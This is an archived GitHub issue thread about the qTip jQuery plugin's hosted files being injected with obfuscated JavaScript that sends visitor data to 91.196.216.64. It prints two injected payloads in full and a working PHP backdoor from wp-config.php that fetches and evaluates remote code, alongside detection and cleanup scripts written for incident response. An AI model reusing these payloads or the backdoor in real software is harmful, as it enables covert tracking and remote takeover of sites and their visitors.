This repository has been archived by the owner on Jun 14, 2020. It is now read-only.

Code compromised, hits 91.196.216.64 frequently ? #286

Closed
paulm17 opened this issue Dec 8, 2011 · 21 comments
Comments


paulm17 commented Dec 8, 2011

Version jquery.qtip-1.0.0-rc3.min.js, taken from the website.

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];

Translates to: ["sc_co", "getElementById", "colorDepth", "width", "height", "charset", "location", "referrer", "userAgent", "script", "createElement", "id", "src", "http://91.196.216.64/s.php?ref=", "&cls=", "&sw=", "&sh=", "&dc=", "&lc=", "&ua=", "head", "getElementsByTagName", "appendChild"]

There is: http://91.196.216.64/s.php?ref= which apparently sends your browser agent and another piece of info.

Also see: http://dan.cx/blog/2011/11/pulling-apart-wordpress-hack for more information.


Craga89 commented Dec 8, 2011

I've disabled all downloads of qTip, qTip2 and Simpletip on my site whilst this is dealt with. Seems an old Wordpress install has been a security vulnerability and infected nearly all JS files on my site... damn it! Thanks for the link and bug report on this no1youknowz, very much appreciated.

I'll update this bug with an update once all the infections are cleared and the site is good to go again. Until then the GitHub code branch is clean as a whistle for those who want to download and use qTip2 :)


sidde commented Dec 8, 2011

Didn't know this was the place for the issue, so I spoke to no1youknowz on IRC, who posted it here.

To provide some more info so developers or sysadmins can find the answers they are looking for. (I tried and found no answers for this URL: http://91.196.216.64/s.php, but I found the WordPress thread posted above with the btt.php file hack.)

This is what a request looks like:
GET http: //91.196.216.64/s.php?ref=&cls=32&sw=1280&sh=1024&dc=utf-8&lc=http://example.com/index.php?p=2&&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20Trident/4.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET%20CLR%201.1.4322%29 HTTP/1.1

The request was generated through this file: jquery.qtip-1.0.0.min.js
I guess one can delete this entire line in this file:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document_0xdc8d[1];if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document_0xdc8d[10];js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document_0xdc8d[21][0];head_0xdc8d[22];} ;
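An added example (not code from the thread or from the qTip project) of how a defender can check a JS file for the injected line shown above: it decodes the `\xNN` escapes inside hex-escaped string arrays and flags decoded strings that name the beacon host or are shaped like its query parameters. The array name `_0xab12` and the sample in `SAMPLE_JS` are constructed for the example.

```python
import re

# Beacon host named in the thread; the injected line built its URLs against it.
BEACON_HOST = "91.196.216.64"

# Hex-escaped string array in the injected line's style: var _0xdc8d=["\x73...",...];
HEX_ARRAY_RE = re.compile(r'var\s+(_0x[0-9a-f]+)\s*=\s*\[([^\]]*)\]', re.I)
# One double-quoted JS string literal, escape sequences included.
STR_LIT_RE = re.compile(r'"((?:\\.|[^"\\])*)"')
HEX_ESC_RE = re.compile(r'\\x([0-9a-fA-F]{2})')

def decode_js_string(literal_body: str) -> str:
    """Expand \\xNN escapes in the body of one JavaScript string literal."""
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), literal_body)

def decode_hex_arrays(js: str) -> dict:
    """Return {array_name: [decoded strings]} for every hex-escaped array in js."""
    found = {}
    for m in HEX_ARRAY_RE.finditer(js):
        name, body = m.group(1), m.group(2)
        found[name] = [decode_js_string(s) for s in STR_LIT_RE.findall(body)]
    return found

def find_beacon_indicators(js: str) -> list:
    """(array, string) pairs naming the beacon host or shaped like its query parts."""
    hits = []
    for name, strings in decode_hex_arrays(js).items():
        for s in strings:
            if BEACON_HOST in s or (s.startswith("&") and s.endswith("=")):
                hits.append((name, s))
    return hits

def is_infected(js: str) -> bool:
    """True when a decoded string literal references the beacon host."""
    return any(BEACON_HOST in s for _, s in find_beacon_indicators(js))

# Constructed sample: a short array built the same way as the one in the thread.
SAMPLE_JS = (
    r'var _0xab12=["\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32'
    r'\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D",'
    r'"\x26\x75\x61\x3D","\x73\x72\x63"];element=document[_0xab12[2]];'
)

if __name__ == "__main__":
    for name, strings in decode_hex_arrays(SAMPLE_JS).items():
        print(name, "->", strings)
    print("infected:", is_infected(SAMPLE_JS))
```

Run it against each `.js` file in the web root; a hit on the host string is the line sidde suggests deleting.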


Craga89 commented Dec 8, 2011

The offending scripts have been removed, as well as the Wordpress blog I suspect caused the vulnerability. Cheers for all the information guys, very much appreciated. I've now got a cron job set up that checks for changes to common scripts and several standard hacking techniques such as the base64_encode trick, so I'll be alerted pretty promptly in future if this happens again... but let's hope it never does now.
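An added example (not Craga89's cron job, which the thread does not show) of the change check he describes: it records a SHA-256 baseline of the script files under a web root and reports anything modified, added or removed on later runs, which is what catches the re-infections reported further down. The scratch directory and file names in `demo()` are constructed; watching `.php` as well as `.js` is an assumption.

```python
import hashlib, json, os, tempfile

WATCHED_EXT = (".js", ".php")  # .js as in the thread; .php added as an assumption

def hash_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(root: str) -> dict:
    """Map relative path -> sha256 for every watched file under root."""
    result = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(WATCHED_EXT):
                full = os.path.join(dirpath, name)
                result[os.path.relpath(full, root)] = hash_file(full)
    return result

def compare(baseline: dict, current: dict) -> dict:
    """Sort files into modified / added / removed relative to the baseline."""
    return {
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }

def check(root: str, baseline_path: str) -> dict:
    """Compare root against the JSON baseline, recording one on the first run."""
    current = snapshot(root)
    if not os.path.exists(baseline_path):
        with open(baseline_path, "w") as f:
            json.dump(current, f, indent=1)
        return compare(current, current)
    with open(baseline_path) as f:
        return compare(json.load(f), current)

def demo() -> dict:
    """Constructed run: baseline a scratch tree, then append a line to one file."""
    root, base = tempfile.mkdtemp(), os.path.join(tempfile.mkdtemp(), "baseline.json")
    js = os.path.join(root, "jquery.qtip.js")
    with open(js, "w") as f:
        f.write("/* clean library code */\n")
    check(root, base)  # first run only records the baseline
    with open(js, "a") as f:
        f.write('var _0xdc8d=["\\x73\\x63"];\n')  # the kind of tampering this thread saw
    return check(root, base)
```

Keep the baseline file outside the web root and mail the report from cron; any non-empty "modified" or "added" list is the alert.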

@Craga89 Craga89 closed this as completed Dec 8, 2011
@phuongnd08

So someone deliberately put this script there to collect information?


Craga89 commented Dec 11, 2011

Yes, though it looks like the information itself was rather harmless, i.e. the user agent string along with your IP. Though obviously that doesn't change the fact that it's still a breach of privacy and trust on my part. Unfortunately there isn't much you can do except proactively remove these things ASAP if/when they happen. Hopefully this will be the last of these occurrences now the security hole has been fixed.

@Schnitzel

We just had the same problem with a really big customer, and we found out because some visitors reported a Trojan warning on the website.

It was exactly the same problem as no1youknowz reported.

But it looks like the code not only sends some meta information; if the meta information is correct, it downloads some other exploits. Check here:

http://www.malekal.com/2011/12/21/91-196-216-64-hacks-de-site-fr-pour-le-virus-gendarmerie/

I would recommend that you write a news entry on the qTip front page that every developer should check his code!

@Schnitzel

Oh, and I just saw that there is no SHA or MD5 hash on the website. I also strongly suggest you add an MD5 hash to the file so that people can check the code for integrity.


Craga89 commented Jan 4, 2012

Actually there's been a notice up about this on the download page for a while, except I noticed after you posted this that I'd forgotten to re-build my page cache so it wasn't showing correctly... apologies for this, and for the inconvenience caused to your customer.

Unfortunately providing an MD5 or SHA1 hash isn't that easy, since the download page allows you to configure your download and choose what plugins to include, etc. I've been looking into this for a while but it's problematic on the back-end to generate before the required package combination has been created (which it isn't until requested by the user).

@arunpjohny

This issue is still present in the file http://craigsworks.com/projects/qtip2/packages/latest/jquery.qtip.js


sidde commented Jan 10, 2012

Seems like it is back, yes. It's the last line of the file, and it is a new one.

var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5]_0x4470[4]){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} 
;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]](new RegExp%28_0x4470[7]+_0xa064x5%28_0xa064x3%29+_0x4470[7],_0x4470[8]%29,_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3]_0x4470[2],0,{}));

Decoding the byte string to UTF-8 gives:
9=1.d('5');b(!9){8=1.j;4=6(1.i);7=6(g.k);a 2=1.e('c');2.f='5';2.h='w://t.u.l.v/s.r?q='+4+'&m='+8+'&n='+7;a 3=1.o('3')[0];3.p(2)},|,split,|document|js|head|hghjhjhjg|dgllhguk|escape|ugkkjkj|hghjghjhjgjh|element|var|if|script|getElementById|createElement|id|navigator|src|referrer|location|userAgent|216|lc|ua|getElementsByTagName|appendChild|ref|php||91|196|64|http,replace,\w+\b,g,

Seems a bit more complicated this time, but sends less info to the Russian server.
I also found your web page is infected this time.

Example of what the requests look like when this script is running:

http://91.196.216.64/s.php?ref=&lc=http://craigsworks.com/projects/qtip2/&ua=Mozilla/5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_7_2%29%20AppleWebKit/534.52.7%20%28KHTML%2C%20like%20Gecko%29%20Version/5.1.2%20Safari/534.52.7

All of the files are infected with the same code:
http://craigsworks.com/projects/qtip2/packages/latest/ and many more files in the other directories too.


Craga89 commented Jan 11, 2012

Looks like the security hole wasn't plugged after all. I'm investigating how the malicious code is being injected, but until then I'm disabling all native downloads from my server. Please use this GitHub repository for grabbing the code and do not hotlink from the latest repository files.

Also, if anyone has any expertise in tracking these types of vulnerability down drop me a line, I really want to get this sorted out ASAP.

@Craga89 Craga89 reopened this Jan 11, 2012
@TheAustinMunro

Any luck figuring out where the hole came from on this? I have a server with ~20 websites and it has spread like wildfire throughout a lot of my js files. It seems to prefer certain theme js files and analyticator js files but it's not contained to just those. I can only go into the js files and get rid of the code but it keeps spreading itself. Help appreciated!


Craga89 commented Jan 16, 2012

Unfortunately not... I've pretty much disabled all custom scripts at this point and I'll be re-enabling them one-by-one over the next few weeks to see which of them is causing the vulnerability! Do you have any Wordpress installs active?

@TheAustinMunro

I'm not sure which WP installs are active, if any. This is my partner's server and I was just trying to do a bit of research for him. I'll be in contact with him later and ask, and then respond here. What's weird is that we can get rid of some of the code from the .js files and it will be fine days later, but other files that we rid of the code will just become corrupt again the next day.

@TheAustinMunro

Could this possibly be the issue? It is a different var string at the beginning but pretty much the same code.
http://www.formtools.org/wordpress/?p=599


Craga89 commented Jan 16, 2012

Looks like that could be it. I had a WordPress site active on my site without realising, which likely caused the issue for me as well, but I want to make sure before I re-enable anything, so I'll monitor the site for the next week or so, see if there's a recurrence, and keep this thread updated.


Thuener commented Jan 17, 2012

I used the following command to remove the line from the files that contain that kind of code:
grep -lr _0x4470 . | xargs sed -i '/_0x4470/d'

I hope it helps.


dedene commented Jan 19, 2012

Did you have already any luck in finding out the root cause / hole by which they could inject this code in all *.js files? I had the same issue on my servers, everything is cleaned and updated now, but still - not very sure if it is really fixed now.

@Thuener, @WrathsU and @Craga89, thanks a lot all for sharing your experience and code snippets!


Craga89 commented Jan 19, 2012

Hey guys, I just got an email from a fellow by the name of "Tauras Paliulis", who's informed me where the vulnerability likely lies! See below for details:

Hi, I found out the problem. Check out the file wp-config.php for the code below. With that 'pingnow=eval' they are executing the PHP code which adds that ugly .js line.

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
    if ($_GET['pass'] == 'f4b9ec30ad9f68f89b29639786cb62ef'){
        if ($_GET['pingnow']== 'login'){
            $user_login = 'admin';
            $user = get_userdatabylogin($user_login);
            $user_id = $user->ID;
            wp_set_current_user($user_id, $user_login);
            wp_set_auth_cookie($user_id);
            do_action('wp_login', $user_login);
        }
        if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0,100)).'.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
        }
        if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
}}}

Since I've disabled the Wordpress blog on my site I'm going to mark this as resolved. Thanks to everyone for all the work done to track this vulnerability down!

@Craga89 Craga89 closed this as completed Jan 19, 2012

Thuener commented Jan 20, 2012

I found this code too.
On 19/01/2012 20:42, "Craig Michael Thompson" <reply@reply.github.com> wrote:


@EugenMayer

http://paste.pocoo.org/show/539577/ that's actually the code from the version of December

@ghost ghost assigned Craga89 Nov 27, 2012